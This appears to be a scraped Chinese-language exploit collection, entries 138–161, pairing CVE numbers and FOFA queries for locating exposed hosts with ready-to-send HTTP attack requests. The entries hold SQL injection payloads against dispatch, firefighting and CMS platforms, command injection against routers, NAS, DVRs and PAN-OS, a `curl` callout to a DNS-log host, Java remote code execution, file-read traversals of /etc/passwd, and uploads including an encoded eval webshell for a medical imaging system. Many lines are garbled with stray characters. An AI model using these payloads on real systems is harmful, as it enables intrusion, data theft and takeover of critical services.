' \7 A8 E) K7 n+ ^' y
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 K% y; R4 @0 @5 f
CVE-2024-2621
* b. Z: K& l$ i5 X, _FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"  e$ |% L( f. ~+ H- t" [  I* O
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
- |. P& [* R% ^+ u  g9 F3 vHost: x.x.x.x. B  P8 n  T# b) [' l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 p+ F+ l/ C9 y- M1 a5 {( nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 q4 K: f8 O) W- f) U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% r# H+ m1 M2 R6 v& c
Accept-Encoding: gzip, deflate, br1 _% m3 {+ V9 ?7 J
Connection: close
" f, \' O& s9 bUpgrade-Insecure-Requests: 1. }& Y3 a/ }7 n

: \6 `3 C' ^+ R
. K- D' Y7 U0 O# }+ K3 ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& n% D) Y# }- oCVE-2024-2622, b& H4 @& ]% s  g
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! U* \% O# i# T" c* F. o7 A3 b
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
6 I( u% v4 U. U. {7 l  u9 fHost: x.x.x.x
3 Z) A& O+ H+ Z) u9 H; l* y1 m, aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 L- Q- D% h/ E4 `+ r0 R, g/ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 M, }! I, U7 l6 r! r8 D( J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 p5 q' Z+ m& ^2 W0 q. Q# @Accept-Encoding: gzip, deflate, br
' \1 {: i: |/ I6 I) c' j7 wConnection: close
/ z. V4 f6 x+ u0 ]6 F0 eCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk( U# `0 r# A& f) w9 {1 C
Upgrade-Insecure-Requests: 1
- }: j5 `$ E7 T+ B  |* \5 \, q, e, x$ |
5 v4 Z3 d. Y0 ^: @# O6 _
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
3 _: P& p$ _: sCVE-2024-2566
( a+ x' [) {$ o5 P7 tFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( i0 v$ h9 a2 P% @! P
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
* z% S9 G& t1 h% J2 eHost: x.x.x.x
2 I2 Z/ t& J4 N( w% e( [  {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( D- d+ E) o& v5 d7 Z  F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- |0 M/ r& A( }9 C- jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 \* k; W! H' v0 Q, D1 P
Accept-Encoding: gzip, deflate, br
, J& V& J+ D( D7 R2 b8 aConnection: close
/ j% t, D( U) O* W4 g+ E8 wCookie: authcode=h8g9( N2 Y+ w- `$ A9 R# W3 B/ M
Upgrade-Insecure-Requests: 15 n3 ^2 N( [9 v& K% V4 T
: |5 c  l- ?5 n1 _- K
# ?. E/ Q2 Y1 z4 g8 M; m) b3 P
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
$ E2 W. q* T8 H- qFOFA:body="指挥调度管理平台"* E, v" t% Y. ?$ M
POST /app/ext/ajax_users.php HTTP/1.1
% |: h* j8 H" K+ f4 wHost: your-ip
4 ?6 X6 ^: D) W; NUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ q  ^( y; q/ w5 ]2 |4 }
Content-Type: application/x-www-form-urlencoded/ O3 b# l1 j) s8 W# V; v% a
* X# ^4 {0 B: N" j( J* Z' f

% {4 U' E5 ]; C: t# z7 R- R, c, Fdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
5 h$ h$ p- s0 j. ]" Q+ }6 ]
9 M! ]: d- v7 y6 }- e5 `. t$ b9 o* `  Q4 q
142. CMSV6车辆监控平台系统中存在弱密码9 `1 c9 {0 b. q
CVE-2024-296665 H% ^- W* B, o7 Y* ?
FOFA:body="/808gps/"
7 |! W0 c5 L) s, aadmin/admin
& y; f/ M9 L! X% A! w6 A143. Netis WF2780 v2.1.40144 远程命令执行. K) }/ F. V, v  X. ~& S' o8 G+ O
CVE-2024-25850
+ [3 l0 y+ O5 qFOFA:title='AP setup' && header='netis'0 R, R) m0 n: t* R
PAYLOAD
9 p- ^0 s" G0 U* E  m
  k, f7 q+ N5 m5 J: Q144. D-Link nas_sharing.cgi 命令注入7 b; h8 P  m. D3 ~
FOFA:app="D_Link-DNS-ShareCenter"
7 C# A2 f5 s* d7 J  {: s8 psystem参数用于传要执行的命令
% `- f/ l) O0 [GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
1 P, v& u9 _3 LHost: x.x.x.x
0 U( ]1 a3 R; }9 V& f: I- uUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
9 V$ R9 p( l& V% S7 p* XConnection: close
. Q% c! I" y; @+ J6 SAccept: */*$ r1 C" \. o4 _) \* d1 H" u# M1 n6 \
Accept-Language: en  q% N! J1 `! w- Z! s
Accept-Encoding: gzip
. \) m. r! Y9 W  m# X" x
- L' q9 N" |% Z5 r1 k: K( B" r$ l( d7 u, \5 E
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
* X2 [, P, T: r# d1 p0 ^& cCVE-2024-3400# z6 n% s* K: f
FOFA:icon_hash="-631559155"
+ ~; C0 Z: l4 e5 cGET /global-protect/login.esp HTTP/1.1
/ }- T: E+ U. D. lHost: 192.168.30.112:1005
# t' q1 u7 t* D1 L  S0 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
  M: F3 }% M3 R  N0 P( |Connection: close6 g8 ?2 c4 u4 F) w/ p* p
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;  b0 k8 ?1 Q! N2 Z" s' v
Accept-Encoding: gzip% Q3 O# [2 [. \* Q4 ^6 S5 `' j& ]

- ]& u1 G9 p) Q- r1 U0 ~7 u3 z5 k
146. MajorDoMo thumb.php 未授权远程代码执行+ q" k- V' M; U6 d' S& ~, d; \
CNVD-2024-02175: b3 @$ g5 J! L' Y, s# w5 [2 V' l
FOFA:app="MajordomoSL"
  M4 M' V; ?6 v7 n+ O! BGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
$ i: ?4 I6 K) A: `: m" A2 XHost: x.x.x.x
$ d' n8 S& T  [- [$ y' S! D; yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: N/ N2 L# n8 X2 |' q/ |, E; {
Accept-Charset: utf-8+ e% |% Y% {4 u- `8 @3 I; ?
Accept-Encoding: gzip, deflate
, P% s+ I( w0 u7 K% UConnection: close
7 H/ P( X. b5 W4 k- V6 s7 s4 Q: s/ f# G3 f

  o4 \5 s. H) @1 u6 {147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 b: A& G- w* l7 }9 D+ u) SCVE-2024-32399
* y8 A( b4 U5 B& I  M2 mFOFA:body="RaidenMAILD"
, U# t" d- s# c+ h' ]GET /webeditor/../../../windows/win.ini HTTP/1.1' Q& @  ~2 G3 D% G
Host: 127.0.0.1:81
! x7 m& N7 j' p1 a! aCache-Control: max-age=08 W. ], k; J! W4 c/ B4 ^% h
Connection: close% j- J% X( Z6 q' p! A; X& B+ |
8 B8 m% a1 m4 L8 |

4 J. I; \2 j9 b, E148. CrushFTP 认证绕过模板注入  T( M1 r7 y* Y" l
CVE-2024-4040/ E0 P- ?! w( O; n# f1 ~
FOFA:body="CrushFTP"0 e+ \3 B# ~. U" ?  {5 X: N
PAYLOAD) J# z8 |+ Y; [3 \2 y* F* J- r- g
! J, u/ v" Q" g& o8 I6 w
149. AJ-Report开源数据大屏存在远程命令执行$ I) g% \* P* T8 L
FOFA:title="AJ-Report"
* ~, w4 p* W* S! T- z$ Q. _% w5 E& h: h
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ J5 J9 d5 k0 P7 f1 X( e- s; Q( j
Host: x.x.x.x* g: B) S% h6 g  U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% N. Z3 a6 x1 Z# W% U- m. F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. {& G6 U7 |/ q8 X0 n) D0 R+ `+ r
Accept-Encoding: gzip, deflate, br
5 ~, q* s/ _3 X3 i4 d) |6 j; gAccept-Language: zh-CN,zh;q=0.9
$ ?+ I% u/ L/ tContent-Type: application/json;charset=UTF-8
) v. t. @9 G! _# wConnection: close7 i. v" G* C6 N* w% A) A4 }

2 v5 l: ^+ U3 c- l. z3 |6 F{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
4 a+ X. q7 q. q8 T0 W9 p! Q& i) J$ B- B, O% A
150. AJ-Report 1.4.0 认证绕过与远程代码执行
/ M9 v3 S+ w+ FFOFA:title="AJ-Report"
! @2 T0 ^3 d! n' M: ^0 GPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 w% N0 _/ t# T3 N7 yHost: x.x.x.x  t4 @9 V" c* c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 i& K  @! Q: X+ x: D& ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 J5 T' {0 M9 y7 X& ~Accept-Encoding: gzip, deflate, br1 D. ~- |% i- c; S9 D
Accept-Language: zh-CN,zh;q=0.9) ^  A! A4 ~  O" y3 N
Content-Type: application/json;charset=UTF-8
# f3 _4 r3 ]# T  pConnection: close- V* Z& {2 |/ b4 k
Content-Length: 339* Q7 l& d0 Q8 p3 ~5 s( K  d

) k/ o, m" `) w; d! \/ w{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
5 W' X6 k* b5 M' j. Y6 K8 F' `/ q7 g- H: R

0 \6 W0 {/ O0 h8 X9 R8 P0 R151. AJ-Report 1.4.1 pageList sql注入( g! I3 G5 n  |. M& M
FOFA:title="AJ-Report"
+ C, c, w0 f0 V' R+ IGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1# T! |8 g1 x; ]4 |0 d* ?& O# v
Host: x.x.x.x
7 f+ q8 X, u/ ~: cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* v( @8 E, R9 {5 X7 E+ ~+ S
Connection: close7 ^3 o$ L7 ~2 ~# ]& D- b
Accept-Encoding: gzip
) c% e. b' i+ B- Y
: {: l  w5 ^8 R) X" x3 k: m; H) m$ s; P* y( ^7 L; f8 f# l
152. Progress Kemp LoadMaster 远程命令执行! Y) H  R+ @8 }/ J6 t
CVE-2024-1212
" W( e+ D" G& L- E$ X; E: _. BLoadMaster <= 7.2.59.2 (GA)
+ R) v" P' Z/ D7 f: m; ^( bLoadMaster<=7.2.54.8 (LTSF)( V  ~3 r+ {& ]) [2 \9 c4 Q/ ]
LoadMaster <= 7.2.48.10 (LTS)% s! n% H" d8 j
FOFA:body="LoadMaster": Y- {8 T3 \- n
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
+ m% |, |7 d. C( Z9 ?GET /access/set?param=enableapi&value=1 HTTP/1.1* ?, s7 _5 T* I% x
Host: x.x.x.x
# H/ E5 |! s, {+ p% j# ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
+ U, k) j) p/ P- n2 zConnection: close, n0 \% E! I  t: z4 z2 i4 P
Accept: */*' P9 Y( Q. f# ]0 f, P: l
Accept-Language: en5 ?" ?3 e  W& G# h; ?9 z
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=% m! P) H. [1 I
Accept-Encoding: gzip* q' r6 g8 I' x1 _" M2 @7 }% h9 u
3 ~( H0 T1 ~9 J+ z

2 L" h0 l2 n  b9 K( h0 f* a153. gradio任意文件读取" z  f. P+ Y* F2 I( K
CVE-2024-1561FOFA:body="__gradio_mode__"
8 U6 c) _9 `# E3 {5 F第一步,请求/config文件获取componets的id% _" f* m* a* _) ^
http://x.x.x.x/config
+ l- u7 e# u. o$ i
) p! w  ^# \4 }' b  p) z: T% v9 G+ e: m$ W) k
第二步,将/etc/passwd的内容写入到一个临时文件$ P3 R/ X" n) i1 ]6 F. A
POST /component_server HTTP/1.1* f% y' _( y" R
Host: x.x.x.x+ |4 n4 X8 Q& v! c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3) x$ t6 E- t2 f- v
Connection: close
; f# f% ]" }4 D- F1 `: {1 IContent-Length: 115: O# o5 s! E! ]# J  }
Content-Type: application/json
4 L7 o2 ]5 V% K9 hAccept-Encoding: gzip" I$ \" b* J3 \& |0 v" d7 M

4 Q9 H+ q- J, ~{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}0 V4 z& p8 |# d, \& I( e

* x& Z# C, [2 r$ e+ F( V/ b0 H) k9 i- v9 {/ ?9 `) t
第三步访问7 O( w( Q) `& I
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
6 D9 s7 W' ^  T5 M% N+ L! _2 P& M1 o0 O7 Y7 \8 _

( ?9 }; m' I0 [/ H/ s7 i% y4 A154. 天维尔消防救援作战调度平台 SQL注入6 F9 Q" y& W6 c$ a
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
) u8 U" a  t1 f/ G, {( PPOST /twms-service-mfs/mfsNotice/page HTTP/1.14 E( }% o; [3 B$ i
Host: x.x.x.x1 R, n; n" i# m- s- \/ t
Content-Length: 106
3 s" j: V5 h2 ~& L7 U' e$ ]+ oCache-Control: max-age=0: u$ i! u/ W4 `: s( f, F
Upgrade-Insecure-Requests: 14 x9 ^" C, L/ o6 |! t8 y
Origin: http://x.x.x.x
% e( `  f7 w' w! e) RContent-Type: application/json
! D3 @. J4 Z. M; t0 Y& E. \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
3 t0 \1 k: h, B5 z6 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ R) b8 r8 d5 \3 S6 \0 j
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page% B% \8 ?" A: X2 y& _' s$ s
Accept-Encoding: gzip, deflate
9 [% K0 h1 }  W- w' K+ j% _% kAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7& _$ m8 l2 C& l) d) R3 b
Connection: close
2 m4 i+ V) r: C* ]% i* ]6 N. R) f
$ j5 R2 Y2 y* y{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
  ]  A) g$ o3 Y( Z& ?2 D. X" z6 g$ o) Q2 l7 G9 e
8 z& R# f2 b4 ]+ d
155. 六零导航页 file.php 任意文件上传
; Q$ A" Q' q! G: sCVE-2024-349829 |3 Z- \. q. t7 Y0 a3 h
FOFA:title=="上网导航 - LyLme Spage"+ F. l+ g5 o, ~+ F
POST /include/file.php HTTP/1.1
7 p9 J4 x. H: V+ `  b: H6 bHost: x.x.x.x( c  p0 p% f9 f- m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
% H9 F  [, P2 KConnection: close  H: p' v1 D6 s! z
Content-Length: 232
. a+ v3 C' q; h2 [! yAccept: application/json, text/javascript, */*; q=0.01
) ~$ n9 h/ T1 _Accept-Encoding: gzip, deflate, br; h* W# }# {+ L1 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* ~" ^+ D1 P" z# A3 Q
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
! ^  a/ @7 a- k$ J# N/ G4 tX-Requested-With: XMLHttpRequest
. F7 G; U" K4 I/ w  i2 f
# y0 W5 u. a' k6 q/ P! B-----------------------------qttl7vemrsold314zg0f
3 J+ `& q- x# f# ~Content-Disposition: form-data; name="file"; filename="test.php"6 `: ~( X2 R3 f( ~
Content-Type: image/png( C+ d6 ^/ d5 g* j. s0 ^4 r" h

1 k. G5 ^9 f9 G: n<?php phpinfo();unlink(__FILE__);?>: f" m( h% y8 k5 n( i- k% o
-----------------------------qttl7vemrsold314zg0f--+ K: `% n8 |4 T
' U; g5 T* }) |! P9 X

: L6 Y. i' w7 d5 ^( _+ |6 q+ f- p访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php/ u9 G' \6 H  c% p) S
9 T. ^( i- U% L0 S- c3 G) m
156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 [6 E1 X7 b& u5 TCVE-2024-3721
& W: G  w/ L) K* n8 Z" \$ ]FOFA:"Location: /login.rsp"0 f, ]- e/ G  f1 B& R
·TBK DVR-4104
8 y: z) O! {$ y·TBK DVR-42168 L0 `$ W3 y8 D
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"" [% X8 \* u  X/ y  \3 c& H% v
! b$ C' ^" Z% J( V; L1 e7 Y+ W
  C( `; j& y* e' [
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1( I% c( G  N9 v$ j: P
Host: x.x.x.x. ^9 h+ S; Z' Q2 D
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 ~) z# K4 k8 a" i( X' g
Connection: close' I- D0 `. x3 ?, [! F( t8 I# t
Content-Length: 0
+ M+ {, f( L7 G% h- ECookie: uid=11 a  J  ^* ~4 M- M8 j  ]- X
Accept-Encoding: gzip) e+ a7 w  v  N5 \) O5 A1 e
8 Z7 v" m! }/ ~5 D- {$ n$ C

; O1 b3 t  Y; U& a* }1 H157. 美特CRM upload.jsp 任意文件上传& H9 q$ x, ~# o; K4 w
CNVD-2023-06971$ ?0 _4 H6 K$ \
FOFA:body="/common/scripts/basic.js"
% u, F9 o  o6 f3 K, s1 R" [& t+ YPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.16 O" [; B7 H0 w/ S5 V
Host: x.x.x.x) N* D" ?4 b" w: {3 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
: u; y" }8 |9 qContent-Length: 709" q; }) y" c. ~9 m* M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! c# l7 c5 y4 b' G0 K- q2 W+ AAccept-Encoding: gzip, deflate- {* h$ X, ~& y, ?2 M6 q- R( U* t
Accept-Language: zh-CN,zh;q=0.9
+ Y; E% Y+ C# c* ^Cache-Control: max-age=0% O# {0 t5 z: E1 y
Connection: close
7 o% r3 c3 I# v. z- k" ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN! N+ f  _3 v+ g; c+ a* d9 t! G
Upgrade-Insecure-Requests: 1
0 q1 |! ?$ o) I" j& C; ^- O! m
$ y& {2 c( D6 Q0 f------WebKitFormBoundary1imovELzPsfzp5dN
4 D5 K2 V4 i3 a/ e" j5 DContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"5 R4 h* [; O. A3 x4 R0 y% N
Content-Type: application/octet-stream% ~2 i/ ?0 P7 T9 C7 x8 U0 f) \7 l* o

0 W7 [' H0 v8 p( Y" L( inyhelxrutzwhrsvsrafb$ Z$ ?9 x; E; f, V6 }9 D- M/ l2 ]3 \
------WebKitFormBoundary1imovELzPsfzp5dN
5 J: H0 I9 A0 o5 f" V3 }( wContent-Disposition: form-data; name="key"
6 [3 _+ d5 D! R0 V, j# b  }- l6 {9 A1 \+ g3 t+ L! w# n! p. J
null
! @( O7 W& a( K1 ?------WebKitFormBoundary1imovELzPsfzp5dN
! n! @; j, {  ^Content-Disposition: form-data; name="form"( W1 ~/ U; O0 }

% Z) Y9 o) y  T+ @: M4 p8 {% dnull
! m" ?6 y3 [4 l; V  k------WebKitFormBoundary1imovELzPsfzp5dN7 y  I5 x6 C* c$ E: X
Content-Disposition: form-data; name="field"
; }, R" K. M& q- S- c- T
: \$ O6 Y  [. G$ a/ hnull
; u0 w2 E! ?/ L& \/ v7 s% n------WebKitFormBoundary1imovELzPsfzp5dN) t4 n6 f, _3 |6 H8 z
Content-Disposition: form-data; name="filetitile"
8 L4 e7 w8 Q& y' N( u' C
4 S  p' i% B6 T+ nnull& s6 l; [* {: [
------WebKitFormBoundary1imovELzPsfzp5dN/ N) z. j; h" t4 R7 F
Content-Disposition: form-data; name="filefolder"- k4 o5 N1 L7 Z3 b
7 E; Z7 ]7 P2 F0 {
null( P$ b3 G5 n5 V7 ^8 z
------WebKitFormBoundary1imovELzPsfzp5dN--
" R: `9 c; J* p9 e( j3 Q4 _/ K9 o5 X6 \% J

$ ?* ?* S/ }, |. jhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp! T+ c# q8 I/ U8 E! z+ i
3 l) g/ l8 {; F
158. Mura-CMS-processAsyncObject存在SQL注入
/ ^: |7 t& J, ACVE-2024-32640
; L, N1 Q5 C# `& F+ d2 z/ J, zFOFA:"Generator: Masa CMS"4 y7 S/ O5 b' s$ k% H& Q: i
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
$ J8 J, a0 v1 x& c) \Host: {{Hostname}}7 W- j+ O- _2 n9 {
Content-Type: application/x-www-form-urlencoded; H% {; c5 Y6 I' n5 r& Z
  F! K/ j6 l* P* P! O, T
object=displayregion&contenthistid=x\'&previewid=1
3 q6 H: f8 j$ I- m1 g  ~+ Y+ J3 L
* r: }/ q8 ?& ?/ ^
% t$ U3 E5 x2 J159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
9 E, ]6 r) C& p& m- LFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
* t+ r, ]4 y5 |0 u2 T' a, u- ?POST /webservices/WebJobUpload.asmx HTTP/1.1
8 s) L* J& D3 x7 C' o( U; XHost: x.x.x.x7 X  @4 ?, Z3 }- v5 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  t. J3 h1 `2 T& v+ KContent-Length: 1080
7 C  U; [8 U8 ~6 \% x. q0 _Accept-Encoding: gzip, deflate
$ O  ]: e: L1 J5 ]4 LConnection: close
  V9 U4 [# l5 }Content-Type: text/xml; charset=utf-8+ a! i1 A) s* _" v
Soapaction: "http://rainier/jobUpload"
* B- w. G( |- L3 v' B# Q% i6 ]+ V" Y7 Z7 ?1 i; }
<?xml version="1.0" encoding="utf-8"?>, x( b) K: D( o  E: E  a
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ d0 M! r& `/ w+ j<soap:Body>
: l# m; k5 s" W! x' y' o# s* R<jobUpload xmlns="http://rainier">
4 W; H5 R5 R8 W) l( e- A<vcode>1</vcode>
. H5 Y5 y4 P! J  L- Y3 c. I<subFolder></subFolder>  }: }1 t' D* h7 }. B- ^
<fileName>abcrce.asmx</fileName>; r/ u8 r) [8 g: y
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
% C: w6 a/ t* F7 n% I</jobUpload>
2 _) d5 v; k5 i/ V</soap:Body>7 n1 V2 B. G2 N. x
</soap:Envelope>/ p6 d; R! u! \9 f3 T

: G" s3 M2 d4 c1 F- V) ^' k. q0 `- V
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World"). D* D& ^6 e8 u4 s7 ~

6 H4 ?! s. l8 i0 z' I2 n# k2 u: x& c& I3 n4 `. g+ U
160. Sonatype Nexus Repository 3目录遍历与文件读取
- Q% P7 @( D$ W( x0 F  ECVE-2024-49566 h+ V& H  P4 K  B; _
FOFA:title="Nexus Repository Manager"
& k7 @& ]0 ]/ B- \# \* k3 v  PGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
% k' p3 f# m1 y+ ^+ CHost: x.x.x.x2 V' W( C  i" T" B! ~/ K3 p. n: ~
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
# b# C0 @# K5 H  @; yConnection: close
  X$ u* J1 i* h4 EAccept: */*8 ]  p! ], N8 G" A( \8 p) C
Accept-Language: en: [( J( @3 K. }: O7 F. z
Accept-Encoding: gzip
% @+ A- a1 `! T8 O4 ~/ |
( f  C3 }' h9 E$ B* d9 G1 O% H5 O8 }6 ^( x( ^
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 Z' s# \) |3 s. XFOFA:body="/KT_Css/qd_defaul.css"
